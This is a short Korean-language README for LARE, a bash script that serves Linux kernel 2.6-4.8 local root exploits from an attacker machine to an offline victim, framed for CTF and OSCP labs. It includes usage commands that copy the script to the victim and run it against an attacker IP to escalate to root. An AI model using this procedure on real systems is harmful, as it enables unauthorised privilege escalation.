
[L]ocal [A]uto [R]oot [E]xploiter는 공격자 머신에서 로컬 루트 익스플로잇을 배포할 수 있도록 도와주는 간단한 bash 스크립트입니다. 피해자 머신이 인터넷에 연결되지 않은 경우에 유용합니다.
[L]ocal [A]uto [R]oot [E]xploiter는 공격자 머신에서 로컬 루트 익스플로잇을 배포할 수 있도록 도와주는 간단한 bash 스크립트입니다. 피해자 머신이 인터넷에 연결되어 있지 않은 경우에 유용합니다.
이 스크립트는 피해자 머신이 인터넷에 연결되지 않은 시나리오(예: 내부 네트워크로 피벗하는 경우, VPN을 사용하여 폐쇄형 랩(예: hackthebox.gr)이나 OSCP 랩에 접속하는 CTF 게임을 하는 경우)에서 유용합니다. 이 스크립트는 Linux 커널 2.6-4.8용 로컬 루트 익스플로잇을 사용합니다.
이 스크립트는 Nilotpal Biswas의 Auto Root Exploit Tool에서 영감을 받았습니다.
bash LARE.sh -a or ./LARE.sh -a
작업이 완료되면, 스크립트를 피해자 머신으로 (wget, ftp, curl 등) 어떤 방법으로든 복사한 후, 다음 명령어로 Exploiter를 로컬에서 실행해야 합니다.
bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]
bash LARE.sh -l or ./LARE.sh -l
이 스크립트는 머신에서 여러 커널 익스플로잇을 실행하여 시스템 불안정을 초래할 수 있으므로, 최후의 수단으로 사용하고 프로덕션 환경이 아닌 곳에서 사용하는 것이 좋습니다.